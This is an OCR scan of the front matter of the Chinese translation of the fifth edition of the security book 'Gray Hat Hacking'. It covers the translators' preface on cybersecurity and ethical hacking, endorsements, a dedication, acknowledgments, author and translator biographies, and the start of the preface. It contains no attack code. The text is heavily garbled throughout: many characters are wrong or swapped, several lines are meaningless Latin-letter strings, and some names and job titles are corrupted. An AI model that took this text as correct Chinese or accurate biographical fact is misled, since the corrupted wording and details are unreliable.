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关注 新 闻 的 朋友 可 能 知道 ，《 焦 点 访谈 》 在 2018 年 11 月 播放 过 一 期 节目 ， 讲 的 
是 网 络 安全 。 节 目 中 报道 的 一 些 事件 触目 惊 心 。 对 于 广大 企业 来 说 ， 恶 意 攻 击 者 尽 
管 不 是 这 种 专业 机 构 ， 但 是 攻击 的 后 果 也 是 非常 严重 的 。 典 型 的 案例 就 是 台积电 因 
为 勒索 病毒 的 攻击 ， 生 产 线 全 数 停 摆 ， 预 计 损 失 高 达 17.4 亿 元 人 民 币 。 从 上 面 的 案 
例 可 以 发 现 ， 网 络 虚 拟 世 界 是 一 个 没有 硝烟 的 战场 ， 时 时 刻 刻 有 心怀 恶意 的 人 试图 
绕 过 公司 的 防护 ， 期 望 获取 不 当 收 益 。 

对 于 网 络 安全 面临 的 严峻 形势 ， 党 和 国家 领导 人 有 敏锐 的 洞察。 习近平 总 书记 
主持 名 开 了 网 络 安 全 和 信息 化 工作 座谈 会 并 对 网 络 安 全 做 出 重要 指示 。 习 近 平 总 书 
ie: “第 一 ， 树 立正 确 的 网 络 安全 观 。 理 念 决 定 行动 。 当 今 的 网 络 安全 ， 有 几 
个 主要 特点 。 一 是 网 络 安全 是 整体 的 而 不 是 割裂 的 。 在 信息 时 代 ， 网 络 安全 对 国家 
安全 罕 一 发 而 动 全 里 ， 同 许多 其 他 方面 的 安全 都 有 着 密 切 天 系 。 二 是 网 络 安全 是 动 
态 的 而 不 是 静态 的 。 信 息 技 术 变化 越 来 越 快 ， 过 去 分 散 独 立 的 网 络 变 得 高 度 关 联 、 
相互 依赖 ， 网 络 安全 的 威胁 来 源 和 攻击 手段 不 断 变 化 ， 那 种 依 徘 装 几 个 安全 设备 和 
安全 软件 就 想 永 保安 全 的 想法 已 不 合 时 宜 ， 需 要 树立 动态 、 综 合 的 防护 理念 。 三 是 
网 络 安全 是 开放 的 而 不 是 封闭 的 。 只 有 立足 开放 环境 ， 加 强 对 外 交流 、 合 作 、 互 动 、 
博弈 ， 吸 收 先进 技术 ， 网 络 安全 水 平 才 会 不 断 提高 。 四 是 网 络 安全 是 相对 的 而 不 是 
绝对 的 。 没 有 绝对 安全 ， 要 立足 基本 国情 保安 全 ， 避 免 不 计 成 本 追求 绝对 安全 ， 那 
样 不 仅 会 背 上 沉重 负担 , 其 至 可 能 顾此失彼 。 五 是 网 络 安全 是 共同 的 而 不 是 孤立 的 。 
网 络 安全 为 人 民 ， 网 络 安全 靠 人 民 ， 维 护 网 络 安全 是 全 社会 共同 责任 ， 需 要 政府 、 
企业 、 社 会 组 织 、 广 大 网 氏 共 同 参与 ， 共 筑 网 络 安 全 防线 。” 

作为 一 名 网 络 安全 从 业 人 员 ， 对 于 网 络 安全 我 们 有 痢 切 身体 会 。 必 须 认识 到 ， 世 
界 上 没有 绝对 安全 的 系统 。 首 先 ， 计 算 机 技术 飞速 发 展 ， 过 去 安全 的 手段 在 今天 强大 
且 廉 价 的 计算 能 力 之 下 ， 节 节 败 退 。 其 次 ， 所 有 的 系统 都 是 由 人 开发 的 ， 开 发 过 程 中 
不 可 避免 存在 逻辑 、 思 维和 技术 上 的 玻 漏 ， 因 此 系统 漏洞 不 可 避免 。 最 后 ， 随 着 新 技 
术 的 出 现 , 新 的 攻击 手段 层出不穷 , 例如 Mirai 僵 尸 网 络 感染 数 以 千 万 计 的 物 联 网 设备 ， 
发 起 有 史 以 来 最 大 规模 的 DDoS 攻击 。 对 于 Mirai 在 还 没有 出 现行 之 有 效 的 应 对 手段 之 
前 ， 攻 击 手段 义 一 次 升级 了 BrickerBot 又 已 经 开始 发 动 PDoS 攻 击 。 

《孙子 兵法 》 说 道 ，“ 知 彼 知 己 ， 百 战 不 至 ; 不知 彼 而 知己 ， 一 胜 一 负 : 不 知 
WAN, BAW. ”企业 的 网 络 安全 建设 往往 从 自身 出 发 ， 关 注 内 部 建设 ， 试 
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图 天 起 门 ， 局 筑 十, 希望 通过 这 样 的 方式 抵御 攻击 。 这 种 做 法 也 就 是 只 能 做 到 知己 ， 
甚至 有 时 连 这 一 点 也 做 不 到 。 在 网 络 安全 的 攻防 中 ， 最 多 只 是 与 不 知名 的 对 手打 个 
平手 。 为 了 在 网 络 防 御 战 中 战胜 对 手 ， 我 们 在 知己 的 同时 还 要 知 彼 ， 了 解 黑客 的 攻 
击 手段 和 方法 。 鉴 于 此 , 为 了 “加 强 对 外 交流 、 人 合作、 互动 、 博 弈 ,吸收 先进 技术 ”， 
我 们 引进 并 翻译 了 《 灰 帽 黑客 (第 $ 版 )》， 和 希望 通过 本 书 ， 让 广大 计算 机 从 业 人 员 ， 
尤其 是 安全 从 业者 ， 能 够 对 计算 机 攻击 方法 有 清晰 的 认识 ， 从 而 在 日 常 的 运 维 及 开 
发 中 加 强 安全 意识 ， 提 升 网 络 防御 能 力 。 

《 灰 帽 黑客 (第 $ 厂 )》 在 漏洞 原理 、 代 人 码 调 优 、 内 存 数 据 提取 的 技巧 、 动 态 调试 、 
静态 分 析 等 各 个 方面 ， 结 合 各 种 实验 ， 指 导读 者 构造 漏 铜 代码 ， 杀 目 动手 来 完成 对 
漏洞 的 利用 。 难 能 可 贯 的 是 ， 漏 洞 代码 量 非常 少 ， 对 初学 者 来 说 很 容易 理解 ， 这 是 
市 面 上 大 部 分 技术 书籍 所 不 具备 的 优点 。 作 为 一 本 经 典 图 书 ， 本 书 退 随 计 算 机 技术 
的 发 展 ， 一 直 在 更 新 。 但 不 可 人 否认， 相对 于 技术 的 发 展 ， 书 本 的 内 容 存 在 清 后 。 但 
本 书 同 广 大 读者 介绍 了 计算 机 攻击 技术 的 基本 原理 和 运用 , 而 这 部 分 变化 相对 较 小 。 
广大 读者 在 掌握 本 书 内 容 的 基础 上 ， 可 参考 其 他 资料 ， 进 一 步 提升 自身 能 力 。 

必须 强调 指出 ， 本 书 介 绍 的 技术 既 可 用 于 提高 网 络 防御 ， 也 可 用 于 进行 网 络 攻 
击 。 广 大 读者 必须 恪守 道德 准则 ， 抵 制 各 种 诱惑 ， 坚 守 “ 未 经 授权 ， 处 理 别 人 的 计 
算 机 和 数据 就 是 犯罪 行为 ”这 一 基本 信条 。 在 安全 界 ， 素 有 “ 白 帽 ”“ 黑 帽 ”“ 灰 
由 ”黑客 之 说 。 黑 帽 黑 客 是 指 那 些 造成 破坏 的 黑客 ; 而 白 帆 黑客 则 研究 安全 ， 以 建 
设 安全 的 网 络 为 己任 ;， 灰 帽 黑 客 发 现 漏洞 却 不 公开 ， 而 是 与 供应 商 一 起 合作 来 修复 
汤 洞 。 我 们 希望 大 家 都 成 为 灰 幅 和 白 帆 黑客， 将 学 到 的 技术 用 于 正义 的 事业 。 

本 书 从 2018 年 4 月 初 开始 ， 经 过 近 8 个 月 的 艰 昔 努力 ， 才 全 部 完成 翻译 。 在 翻译 
过 程 中 译 者 力求 忠于 原 者 ， 尽 可 能 传达 作者 的 原意 。 在 此 ， 非 剃 感谢 栾 汽 先 生 ， 正 
是 在 他 的 努力 下 ， 这 些 译 者 才能 聚集 到 一 起 ， 完 成 这 项 工作 。 同 时 ， 栾 浩 先 生 投 入 
了 大 量 的 时 间 和 精力 ， 组 织 翻译 工作 ， 把 控 进 度 和 质量 。 没 有 他 的 工作 ， 翻 译 工 作 
不 能 这 么 顺利 地 完成 。 同 时 ， 也 要 感谢 姚 遍 先生， 他 全 程 参与 文稿 的 翻译 和 校对 ， 
投入 大 量 业 余 时 间 对 文稿 进行 了 多 轮 校 对 , 提出 大 量 宝 贯 意见 , 保证 了 全 书 的 质量 。 
同时 感谢 清华 大 学 出 版 社 和 编辑 的 严格 把 天 ， 正 是 因为 他 们 的 辛勤 付出 和 党 午 的 锻 
后 工作 ， 才 有 了 本 书 的 出 版 。 

感谢 网 安 科 拉 有 限 公 司 组织 的 安全 技术 资源 ， 以 及 对 本 书 翻译 和 校对 工作 给 予 
的 大 力 文 持 。 

本 书 涉及 内 容 广 泛 ， 立 意 精深 。 因 为 能 力 局 限 ， 在 翻译 中 难免 有 错误 或 不 受 之 
处 ， 尽 请 广大 读者 朋友 不 音 指 正 ， 不 胜 感激 。 


从 业 人 员 对 本 书 的 赞誉 


《 灰 幅 黑客 (第 5 版 )》 一 如 既往 地 呈现 大 量 攻 击 性 IT 安 全 原则 的 最 新 知识 精髓 。9 
位 作者 部 十 备 受 强 守 的 信息 安全 大 师 ， 将 与 读者 共 至 突破 安全 机 制 的 技术 经 验 和 
专长 。 

本 书 第 II 部 分 由 Stephen Sims 撰 写 , 浓 壁 重 彩 地 朱 述 最 新 漏洞 攻击 程序 的 编写 方 
式 。 第 14 章 使 用 主流 Web 浏 览 厚 中 的 最 新 漏洞 ， 披 露 如 何 为 “与 栈 相关 的 内 存 损坏 ” 
编写 漏洞 攻击 程序 ， 从 而 绕 过 内 存 保护 。 

对 于 有 记 于 从 事 信息 安 全 的 人 士 而 言 ， 本 书 堪 称 一 座 燃 糯 生 涟 的 资源 宝库 ! 

—Peter Van Eeckhoutte 
Corelan Team (@corelanc0d3r) 


kits 2 GBShR) ÆRE BdBGSRHJSSGE. BES AIH S HT SE HT 
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术语 和 概念 ， 了 解 最 新 的 汤 洞 攻击 搁 术 ， 知 识 体系 将 变 得 十 分 庞大 。 本 书 作者 部 
是 各 目 领 域 的 顶尖 专 家 ， 将 引领 我 们 紧 蒜 跟随 安全 趋势 ， 书 中 介绍 的 红 队 操作 、 
Bug 黄 金 计 划 、PowerShell 技 术 以 及 物 联 网 和 骨 入 式 设 备 都 是 我 们 必须 掌握 的 新 知 
—Chris Gates 

Uber 局 级 安全 工程 是 


攻击 技术 数量 空前 ， 控 制 和 保护 机 制 也 达到 前 所 未 有 的 高 度 。 现 代 操 作 系 

统 和 应 用 程序 在 不 断 进 步 ， 对 黑客 攻击 的 防范 能 力 令 人 印象 深刻 ， 但 条 件 成 熟 

时 ， 黑 客 仍 不 时 得 手 。 本 书 呈 现 大 量 最 新 技术 ， 分 步 评 解 漏洞 ， 分 析 如 何 绕 过 

ASLR 和 DEP 控 制 。 在 大 量 实例 的 引导 下 ， 你 将 对 最 新 的 黑客 攻击 技术 有 更 深刻 
的 理解 。 

—James Lyne 

Sophos EEk zz 4 Bit |n] dS ANS Institute 研 友 总 监 
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纪念 Shon Harris 


在 本 书 前 几 个 版 本 中 ， 我 都 搂 文 怀念 我 的 朋友 、 导 师 以 及 我 最 信赖 的 人 Shon 
Harris。 我 从 美国 海军 陆 战 队 退役 并 开局 新 职业 时 ，Shon 是 我 的 指 路 人 ， 在 同 Shon 
一 起 工作 的 日 子 里 ， 我 们 彼此 合作 愉快 。 长 话 短 说 ， 如 果 当 初 没 有 Shon Harris, Hi 
不 会 有 本 书 ; 厂 丰 是 Shon 一 路 提携 ， 我 的 职业 生涯 也 无 法 取得 持 越 成 就 。 我 一 直 非 
常 想念 她 ， 我 谨 代 表 本 书 其 他 作者 说 ， 我 们 爱 你 ， 你 永远 活 在 我 们 心中 。 如 果 你 不 
了 解 Shon， 你 应 当 通 过 本 书 以 及 其 他 书籍 阅读 她 的 感人 事迹 。 我 们 的 尖 脑 中 都 有 
Shon 的 鲜 话 记忆 , 一 直 因 为 有 她 这 样 的 朋友 而 目 紧 , 并 愿意 将 她 的 故事 讲 给 大 家 听 。 
Shon 是 一 个 充满 魅力 的 人 ， 声 誉 斐然 ， 购 予 我 们 善 划 和 慷慨 ! 我 们 深 深 地 怀念 她 。 
间 以 本 书 表达 对 她 的 敬 音 和 怀念 之 情 。 


Allen Harper 
本 书 第 一 作者 ，Shon Harris 的 朋友 


谢谢 母亲 的 辛勤 哺育 和 精心 培养 ， 和 帮助 我 提高 文字 水 平 ， 使 我 成 为 一 名 作家 。 
— Ryan Linn 


感谢 爱 妻 LeAnne 和 女儿 Audrey， 谢 谢 你 们 的 一 吐 支 持 ! 


Stephen Sims 


谢谢 爱 女 Elysia 无 条 件 给 予 的 关爱 和 文 持 ， 你 在 多 个 方面 或 励 我 前 进 , 我 也 永远 
是 你 的 坚强 后 盾 和 文 持 者 。 
-Linda Martinez 


谢谢 亲友 们 无 义 的 文 持 和 帮助 ， 让 我 的 生活 甜蜜 笠 福 ! 


— ——Branko Spasojevic 


RUN )LTiernan SCRE, AA THe MEE ELEAF REAR AA. a EKA MA 
出 色 的 人 。 


Michael Baucom 


感谢 儿子 Aaron 市 给 我 的 爱 , 尽 官 我 化 了 大 量 时 间 从 事 写 作 , 也 感谢 我 们 在 一 起 
时 共同 分 圣 的 快乐 。 
— —Chris Eagle 


致谢 


本 书 所 有 作者 都 想 表 达 对 支 格 区 -布尔 教育 集团 (McGraw-Hill Education) 的 编辑 
们 的 谢意 。 尤 其 要 感谢 Wendy Rinaldi 和 Claire Yee， 正 是 你 们 使 我 们 步 入 了 正轨 ， 并 
在 整个 过 程 中 给 予 了 已 大 帮助 。 你 们 委 高 的 职业 精神 和 筷 我 奉献 提高 了 出 版 社 的 信 
誉 ， 感 谢 你 们 对 这 个 项 目的 重要 页 献 ! 

Allen Harper: 感谢 爱 妻 Corann 和 两 个 美丽 活泼 的 女儿 Haley 与 Madison。 感 谢 你 
们 在 我 转行 时 给 予 的 文 持 和 理解 。 

我 深 深 地 爱 着 你 们 ，Haley 与 Madison 一 天 天 地 长 大 了 ， 出 落得 美丽 端庄 ， 我 备 
感 上 自 桶 。 感 谢 前 雇主 和 目前 的 雇主 。 感 谢 Tangible 安 全 公司 的 朋友 们 对 我 的 帮助 ， 让 
我 过 上 更 壮 福 的 生活 。 谢 谢 利 伯 弓 大 学 的 师 生 们 ， 有 和 闪 在 这 些 年 与 你 们 共事 ， 我 校 
ESTEE KEIM | 

Branko Spasojevic: 感谢 各 位 家 性 成 员 一 一 Sanja、Sandra、Ana Marija. 
Magdalena、Ilinka、Jevrem、Olga、Dragisa、IMarija 和 Branislav， 感 谢 你 们 的 支持 。 
生活 在 这 样 的 书香 门 第 ， 我 备 感 玉 辛 。 

还 感谢 所 有 乐于 免费 分 享 知识 惠及 他 人 的 朋友 们 。 需 要 特别 提 及 的 是 Ante 
Gulam, Antonio. Cedric. Clement, Domagoj, Drazen, Goran, Keith, Luka, Leon, 
Matko, Santiago. Tory EA /* TAG. Zynamics, D&RZllOrcall] ALAE- 

Ryan Linn: 感谢 Heather 的 文 持 、 豆 励 和 建议 ， 以 及 家 人 和 朋友 们 的 文 持 。 这 
BANE TS EM aT Securit, BUTI BA ip 

感谢 Ed Skoudis, 知 没 有 你 的 推动 ,我 不 可 能 完成 这 么 棒 的 事情 ! 还 有 HD、Esgypt、 
Nate、Shawn 以 及 其 他 所 有 在 我 最 需要 的 时 候 伸 出 援手 ， 提 供 代 码 协 助 、 指 导 及 文 
持 的 朋友 和 家 人 。 

Stephen Sims: 感谢 我 的 妻子 LeAnne 和 女儿 Audrey， 感 谢 你 们 一 直 以 来 对 于 我 
EGR IN AS. SVE. TE ACH RAN SHE. 

也 要 感谢 父母 George 和 Mary， 以 及 妹妹 Lisa， 感 谢 你 们 的 帮助 。 最 后 特别 感谢 
明 过 论文 、 演 讲 和 工具 对 社区 建设 页 献 民 多 的 那些 才华 横 洲 的 安全 研究 者 们 。 

Chris Eagle: 感谢 雪子 Kristen 的 易 力 文 持 。 没 有 你 的 文 持 ， 我 将 一 事 无 成 。 

Linda Martinez: 谢谢 勤 钢 的 父母 ， 你 们 就 是 我 的 光辉 榜样 。 感 谢 女 儿 Elysia 多 
年 来 的 文 持 ， 使 我 能 投入 事业 ， 妃 逐 梦 想 。 

城 争 地 感谢 我 的 朋友 以 及 一 些 行 业 精 严 ， 如 Allen、Zack、Rob、Ryan、Bil 和 
Shon. 


VI 
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Michael Baucom: 感谢 妻子 Brideget 和 女儿 Tiermnan， 为 支持 我 的 事业 ， 你 们 默默 
付出 了 很 多 。 

谢谢 父母 的 爱 和 文 持 ， 你 们 给 我 灌输 了 做 人 的 道理 ， 培 育 了 我 的 上 进 心 ， 使 我 
在 事业 方面 取得 了 今天 的 成 就 。 感 谢 美 国 海军 陆 战 队 给 予 我 元 服 一 切 困 难 的 信心 。 
最 后 感谢 同事 兼 好 友 Allen Harper。 这 个 日 越 的 团队 让 我 在 工作 中 如 鱼 得 水 。 

我 们 所 有 作者 还 要 集体 感谢 Hex-Rays， 感 谢 你 们 慷慨 地 提供 了 IDA Pro 工 具 ! 


技术 编辑 简介 


Heather Linn 拥 有 逾 20 年 的 安全 领域 工作 经 验 ， 曾 在 公司 安全 、 渗 透 测试 、 威 
胁 狂 杀 团 队 工作 。Heather 为 Metasploit 等 开源 框 染 做 出 页 献 ， 轩 在 全 球 讲 授 取 证 、 渗 
透 测 试 和 信息 安全 等 课程 ， 并 为 这 些 课程 页 献 资料 。 

Heather 曾 在 多 个 技术 会 议 上 发 表演 讲 ， 包 括 BSides、 区 域 ISSA 分 会 ， 并 同人 信息 
安全 领域 的 新 生 授 诗 ， 帮 助 学 生 们 了 解 现在 ， 展 望 未 来 。 


作者 简介 


Allen Harper 博 士 ，CISSP。Allen 曾 担任 美国 海军 陆 战 了 从 (Marine Corps) 军 官 ， 
2007 年 ， 在 伊拉克 之 旅 结 束 后 退役 。Allen 拥 有 30 年 以 上 的 IT/ 安 全 经 验 。Allen 从 
Capella 大 学 获得 IT 博 士 学 位 ， 研 究 方 同 是 信息 保障 和 安全 ;， 从 海军 研究 生 阮 (NPS) 
获得 计算 机 科学 硕士 学 位 ， 从 北 卡 罗 来 纳 州 大 学 获得 计算 机 工程 学 士 学 位 。Allen 负 
bt 7JHoneynetJJl H fa SI / 44 7JroolT] 3 —fV CD-ROM. Allen? JHfE ZZ Ub gi 
50058 A Fl ABO ALISA Ze By HR]. Allen HX]. Bi] EE. Jer] RA EAH 
形式 的 道德 黑客 攻击 感 兴趣 。Allen 是 N2? Net Security 有 限 公 司 的 创始 人 ， 曾 担任 
Tangible 安 全 公司 的 执行 副 总 裁 和 首席 道德 黑客 。Allen 目 前 担任 利 伯 绽 大 学 (位 于 弗 
吉 尼 亚 州 林 奇 堡 市 ) 网 络 章 越 中 心 的 执行 总 监 。 

Daniel Regalado( 又 名 Danux) 是 一 名 墨西哥 裔 的 安全 研究 员 ， 在 安全 领域 拥有 
16 年 以 上 的 丰 定 经 验 ， 曾 参与 恶意 软件 、 零 日 攻击 、ATM、 物 联网 设备 、 议 脉 注册 
和 和 汽车 信息 娱乐 系统 的 剖析 和 渗透 测试 .Daniel 曾 在 FireEye 和 守门 铁 克 (Symantec) 
等 知名 公司 工作 ， 目 前 担任 Zingbox 的 首席 安全 研究 员 。Daniel 曾 分 析 针 对 全 球 银行 
AITM 的 恶意 软件 攻击 ,获得 多 项 发 明 , 并 因此 成 名 , 最 著名 的 有 友 明 有 Ploutus、Padpin 
和 Ripper。 

Ryan Linn 在 安全 领域 积累 了 请 20 年 的 经 验 。 曾 担任 系统 编程 人 员 、 公 司 安全 人 
员 ， 还 领导 过 全 球 网 络 安 全 咨询 工作 。Ryan 参 与 过 多 个 开源 项 目 ， 包 括 Metasploit 
和 和 Browser Exploitation Framework (BeEF) 守 。Ryan 的 推 符 账 号 是 @sussurro， 曾 在 多 
个 安全 会 议 ( 包 括 Black Hat、DEFCON) 上 发 表 研 究 报 告 ， 并 为 全 球 机 构 提供 攻击 和 
取证 拉 术 方面 的 培训 。 

Stephen Sims 是 一 位 业内 专家 ， 在 信息 技术 和 安全 领域 拥有 请 15 年 的 经 验 。 
Stephen 目 前 在 旧金山 担任 顾问 ， 提 供 逆 癌 工程 、 漏 洞 攻击 程序 开 及 、 威 胁 建 模 和 渗 
透 测试 方面 的 咨询 。Stephen 从 诺 威 治 大 学 获得 信息 保障 硕士 学 位 ， 是 SANS 机 构 的 
高 级 讲师 、 谍 程 作 者 和 研究 员 ， 编 写 高 级 漏洞 攻击 程序 和 渗透 测试 读 程 。Stephen 曾 
在 多 个 重要 的 技术 会 议 上 发 表演 讲 ， 如 RSA、 BSides、OWASP AppSec、ThaiCERT 
TIAISASSE. Stephen) TE RH 5 4 @Steph3nSims. 

Branko Spasojevic 是 谷歌 检测 和 啊 应 团队 的 安全 工程 师 , 他 曾 在 完 门 铁 元 担任 
道 回 工程 师 ， 并 分 析 过 各 类 威胁 和 APT 组 。 

Linda Martinez 是 Tangible 安 全 公司 商业 服务 交付 部 门 的 首席 信息 安全 官 兼 副 总 
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裁 。,Linda 是 一 位 老道 的 信息 安全 执行 官 和 业内 专家 , 具有 18 年 以 上 的 管理 技术 团队 、 
开拓 技术 业务 范围 以 及 为 客户 提供 优质 咨询 服务 的 经 验 。Linda 负 责 管 理 Tangible 安 
全 公司 商业 服务 交付 部 门 ， 业 务 泡 围 包括 : 渗透 测试 ( 红 队 和 紫 队 操作 )， 人 硬件 攻击 ， 
产品 和 供应 链 安 人 全， 治理、 风险 管理 和 合 规 ， 应 急 啊 应 和 数字 取证 。 喘 为 首席 信息 
EEE Linda NB AZ i] Ve A e AB S 此 前 ，Linda 曾 担任 N2 Net Security 的 
运营 副 总 裁 ， 曾 参与 创立 信息 安全 人 研究 和 咨询 公司 Executive Instruments， 并 担任 首 
席 运 营 官 。 

Michael Baucom 目 前 担任 Tangible 安 全 公司 Tangible 实 验 室 的 副 总 裁 , 曾 参 与 多 
个 项 目 ， 包 括 软件 安全 评估 、SDLC 咨 询 、 工 具 开 发 和 渗透 测试 。 此 前 ，Michael 曾 
在 美国 海 盏 陆 战 队 担任 地 面 无 线 电 维修 员 。 另 外 ，Michael 曾 在 IBM、Motorola 和 
Broadcom 担 任 多 个 职位 ， 包 括 测 试 工程 是 、 设 备 驱 动 程序 开发 人 员 以 及 藤 入 式 系 统 
软件 开发 人 员 。Michael 还 担任 Black Hat 增 训 师 ， 为 本 书 提 供 技术 建议 ， 曾 在 多 个 技 


术 会 议 上 发 表演 讲 。Michael 目 前 的 研究 方 回 是 渗透 测试 活动 的 目 动 化 、 租 入 式 系统 
安全 和 手机 安全 。 


Chris Eagle 是 位 于 加 州 蒙特 利 尔 的 海军 研究 生 院 (Naval Postgraduate School, 
NPS) 计 算 机 科学 系 的 高 级 讲师 。 作 为 一 位 具有 30 年 以 上 经 验 的 计算 机 工程 师 及 科学 
家 ， 他 曾 撰写 多 本 书籍 ， 曾 担任 DARPA 的 Cyber Grand Challenge 的 首席 架构 师 ， 经 
季 在 安全 会 议 上 发 表演 讲 ， 为 安全 社区 页 献 了 多 个 流行 的 开源 工具 。 

Shon Harris( 己 故 ) 令 人 无 限 怀念 。Shon 是 Logical Security A EJA M 
全 顾问 ， 兽 担任 美国 空 车 信息 战 (U.S. Air Force Information Warfare) 部 队 的 工程 师 ， 
也 是 一 名 作家 、 教 育 工作 者 。Shon 撰 写 了 畅销 全 球 的 《CISSP 认 证 考试 指责 》( 最 新 
版 本 是 第 8 版 ) 以 及 其 他 多 本 著作 。Shon 曾 为 来 自 多 个 不 同行 业 的 各 类 公司 提供 咨询 
服务 ， 也 曾 为 广泛 的 客户 讲授 计算 机 和 信息 安全 课程 ， 这 些 客户 包括 RSA、 
Department of Defense, Department of Energy. West Point. National Security Agency 
(NSA), Bank of America, Defense Information Systems Agency (DISA)#IBMC. Shon 
A Information Security Magazinev} 为 信息 安全 领域 2$ 位 最 杰出 的 女性 精英 之 一 。 

REAR: 本 书 中 发 表 的 内 容 均 属 作者 个 人 观点 ， 并 不 代表 美国 政府 或 这 里 提 
及 的 其 他 任何 公司 。 


WE A fa T 


来 浩 , 获得 上 海 大 学 项 目 党 理 专 业 管 理学 学 士 学 位 , REHCISSP. CISA, CCSK, 
ISO 27001 LA 和 BS 25999 LA 等 认证 ,现任 融 天 下 互联 网 科技 (上 海 ) 有 限 公 司 CTO 及 
CISO 职 务 ， 人 负责 金融 科技 研发 、 业 务 安 全 及 反 舞 次 、 信 息 安 全 、 数 据 安全 和 风 控 审 
计 等 工作 ，2015 一 2019 年 度 ISC》 上 海 分 会 理事 。 栾 党 先 生 担 任 本 书 翻译 工作 的 忆 
技术 负责 人 ， 负 责 统筹 全 书 各 项 工作 事务 ， 并 承担 第 1~10 章 的 翻译 工作 ， 以 及 全 书 
的 校对 、 定 稿 工 作 。 

毛 小 飞 ， 毕 业 于 湘潭 大 学 计算 机 系 ， 持 有 CISSP 和 ISO 27001 等 认证 。 现 任 京 东 
集团 企业 信息 化 部 安全 技术 负 贡 人 ， 人 负 贡 渗 史 测试、 病毒 分 析 、 安 全 产品 开发 和 
应 急 啊 应 等 工作 。 毛 小 飞 先生 负责 本 书 第 11~13 章 的 翻译 工作 以 及 部 分 章节 的 校对 
EE" 

姚 凯 ， 获 得 中 欧 国际 工商 管理 学 院 MBA 管 理学 硕士 学 位 ， 持 有 CISSP、DPO、 
CISM、IAPP-FIP、CISP 和 CISA 等 认证 。 现 任 欧 喜 投资 (中 国 ) 有 限 公 司 I 总 监 ， 全 面 
负责 IT 及 安全 工作 。 姚 凯 先生 负责 第 14~20 章 的 翻译 工作 ， 以 及 部 分 章节 的 校对 、 统 
稿 及 定稿 工作 ， 并 为 本 书 撰写 了 译 者 序 。 

雷 兵 ， 获 得 同济 大 学 海洋 地 质 专 业 理 学 硕士 学 位 ， 持 有 CISSP、CCSP、CISM、 
CISA 和 CEH 等 安全 认证 。 现 任 安全 专家 ， 负 贡 大 数据 相关 安全 工作 。 雷 兵 先 生 负 责 
本 书 第 21~23 草 的 翻译 工作 ， 以 及 部 分 章节 的 统 稿 、 校 对 及 定稿 工作 。 

王 向 于 ， 获 得 安徽 科技 学 院 网 络 工程 专业 工学 学 士 学 位 ， 持 有 CCSK、CISP、 
CISP-A 和 软件 开发 安全 师 等 认证 ， 现 任 和 未 东 集团 企业 信息 化 部 局 级 安全 工程 是 ， 负 
责 日 常安 全 事件 处 置 与 应 急 、 数 据 安 全 、 安 全 监控 平台 开发 与 运营 、 云 平台 安全 和 
软件 开 友 安全 等 工作 。 王 回 衬 先生 负责 本 书 第 24 和 25 草 的 翻译 工作 ， 以 及 部 分 章节 
的 校对 工作 。 

付 晓 洋 ， 获 得 卡 内 基 梅 隆 大 学 信息 系统 演 理 人 饥 士 学 位 。 现 任 聚 思 鸿 信息 技术 服 
务 有 限 公 司 高 级 软件 工程 师 ， 负 责 软件 产品 的 技术 设计 、 开 发 以 及 代码 安全 加 固 工 
作 。 付 晓 洋 先生 负责 本 书 涉 及 开 友 及 代码 的 和 草 贡 的 校对 工作 。 

吴 微 ,获得 北京 邮电 大 学 信息 与 计算 科学 专业 理学 学 士 学 位 , 持 有 CISP、CCSE 
和 RHCE 等 证 书 。 现 任 中 国航 空 结算 有 限 责 任 会 司 高 级 网 络 工程 师 ， 负 责 网 络 架 构 
设计 、 安 全 运营 等 工作 ， 被 授予 中 央企 业 技 术 能 手 、 全 国民 航 技术 能 手 等 多 项 荣誉 
称号 。 半 微 女 士 负 贡 本 书 的 全 书 校对 工作 。 

邵 德 强 ， 获 得 北京 航空 航天 大 学 计算 机 科学 与 技术 专业 工学 学 士 学 位 ， 持 有 
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CISA. ISO 27001 和 CISP 等 认证 。 现 任 包 商 银行 股份 有 限 公 司 数据 安全 管理 岗 ， 负 
责 公 司 的 数据 安全 体系 建设 、 系 统 与 数据 安全 项 目 管 控 以 及 数据 安全 审计 与 合 规 等 
工作 。 邵 德 强 先生 负责 本 书 部 分 音节 的 校对 工作 。 

在 本 书 的 翻译 及 校对 过 程 中 ， 还 有 多 位 安全 专家 给 予 了 帮助 ， 包 括 卡 巴 斯 基 吕 
动 先 生 、 雇 勇 博 士 、 京 东 集团 李 继 君 先生 以 及 顺丰 集团 张 东 先 生 等。 最 后 ， 感 谢 
ASCP 上 海 分 会 诸位 技术 专家 对 本 书 翻译 过 程 的 大 力 文 持 ! 
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我 不 知道 第 三 次 世界 大 战 用 什么 武器 ， 但 我 知道 第 四 次 世界 大 战 中 用 的 肯定 是 
棍棒 和 石头 。 
阿尔 伯 特 。 爱 因 斯 坦 


人 基文 明 的 确 在 进步 ， 但 这 个 能 保证 你 的 安全 …… 在 每 次 战争 中 ， 政 方 都 会 试 
图 倍 助 新 武器 、 新 战术 消灭 你 。 


不 战 而 届 人 之 兵 ， 善 之 善 者 也 。 
孙子 


本 书 由 致力 于 以 道德 和 负责 任 的 工作 方式 来 提升 个 人 、 企 业 和 国家 的 整体 安全 
性 的 信息 安全 专业 人 员 编 扎 ， 适 合 相关 专业 人 士 阅 读 。 本 书 旨 在 向 你 提供 过 去 只 有 
少数 黑客 才 了 解 的 信息 。 无 论 是 个 人 , 还 是 一 家 机 构 的 防御 者 ， 在 面 对 黑 由 黑客 时 ， 
对 敌人 的 深入 了 解 非常 重要 ， 包 括 他 们 的 策略 、 技 能 、 工 具 和 动机 。 因 此 本 书 将 带 
你 领会 灰 帽 黑客 的 思路 ， 即 道德 黑客 使 用 攻击 性 技术 达到 防御 性 目的 。 道 德 黑 客 始 
终 尊重 法 律 和 他 人 的 权利 ， 并 且 相信 ， 通 过 先行 的 自我 测试 和 完善 ， 对 手 将 无 处 下 
手 ， 知 难 而 退 。 

本 书 作者 们 希望 为 读者 提供 我 们 所 认为 的 这 个 行业 和 社会 所 需 的 信息 : 对 负责 
任 的 而 且 在 意识 和 物质 方面 真正 合乎 道德 标准 的 正义 黑客 技术 的 整体 性 讨论 。 这 也 
是 我 们 为 什么 一 直 坚 持 在 本 书 每 个 新 版 本 的 开头 就 给 出 正义 黑客 的 清晰 定义 的 原因 
所 在 ， 社 会 上 对 正义 黑客 的 理解 是 非常 模糊 的 。 

本 书 对 第 4 版 中 的 内 容 做 了 全 面 细致 的 更 新 ， 并 尝试 将 最 新 最 全 的 技术 、 流 程 、 
材料 以 及 可 重复 的 实际 动手 实验 组 合 起 来 。 在 第 4 版 的 基础 上 ， 第 5 版 中 增加 了 13 章 
